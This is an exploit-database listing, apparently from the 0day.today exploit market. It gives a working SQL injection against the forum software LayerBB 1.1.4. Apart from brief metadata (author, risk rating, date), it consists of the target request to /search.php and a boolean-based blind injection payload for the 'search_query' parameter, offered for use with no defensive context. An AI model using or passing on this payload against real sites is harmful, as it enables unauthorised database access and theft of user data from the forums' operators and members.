[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LayerBB 1.1.4 - (search_query) SQL Injection Vulnerability

Author
Görkem Haşin
Risk
[
Security Risk High
]
0day-ID
0day-ID-35859
Category
web applications
Date add
24-02-2021
Platform
php
# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
# Exploit Author: Görkem Haşin
# Version: 1.1.4
# Tested on: Linux/Windows

# POST /search.php HTTP/1.1
# Host: Target

Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search

#  0day.today [2024-11-16]  #